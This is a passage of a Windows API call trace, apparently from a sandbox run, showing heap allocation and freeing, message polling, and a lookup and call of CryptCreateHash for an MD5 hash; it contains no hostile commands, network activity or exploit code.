wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.218] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.218] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.218] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.218] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.218] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.218] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.218] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0267.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.219] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0267.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51df0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0267.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.219] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0267.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.220] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0267.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0267.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0267.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0267.222] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0267.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0267.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0267.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0267.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55018 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0267.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.225] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0267.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0267.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0267.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0267.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.227] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0267.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0267.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d18 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0267.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.228] 